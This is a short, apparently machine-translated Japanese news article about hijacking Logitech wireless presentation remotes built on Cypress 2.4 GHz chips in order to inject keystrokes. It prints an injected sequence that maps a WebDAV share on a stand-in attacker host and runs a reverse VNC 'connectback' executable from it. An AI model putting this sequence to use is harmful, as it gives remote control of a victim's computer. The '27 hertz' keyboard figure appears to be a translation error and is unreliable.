
多数の聴衆の前でプレゼンテーションを行う必要がある場合は注意してください。 ハッカー
はリモートプレゼンテーションをリモートでハッキング
する方法を発見したため、攻撃者はスピーチ中にリモートコントロールを制御できるようになりました。 さらに悪いことに、リモートコントロールを使用して、プレゼンテーションコンピューターで実行されるキーストロークを送信できます。
1. [Win + R]
2.net use X:http://攻撃者/ webdavshare
3.X:\ VNCconnectback.exe
4. [入力]
機器はLogitech R-R0001およびLogitech R400リモート(写真)で既に正常にテストされていますが、サイプレスセミコンダクターの標準チップを使用する他のリモートも脆弱です。
過去数年にわたって、無線機器の安全性に関する大量の文献が公開されています。 27ヘルツの無線キーボードは、自宅で組み立てられた
簡単なデバイスで聞くことができることが知られています。 2.4 GHzキーボードは
、昨年末にのみハッキングされました 。 そして今では、プレゼンテーションを管理するための2.4 GHzデバイスが登場しましたが、その動作原理はキーボードと変わりません。 これらのデバイスのほとんどすべてが、サイプレスセミコンダクターズ製の同じ2.4ギガヘルツチップ
CYRF6936または
CYRF69103を使用し、独自のワイヤレスプロトコルで動作します。
信号傍受用のデバイスは、Arduinoコンストラクターとワイヤレスモジュールから構築でき、コストは30ユーロです。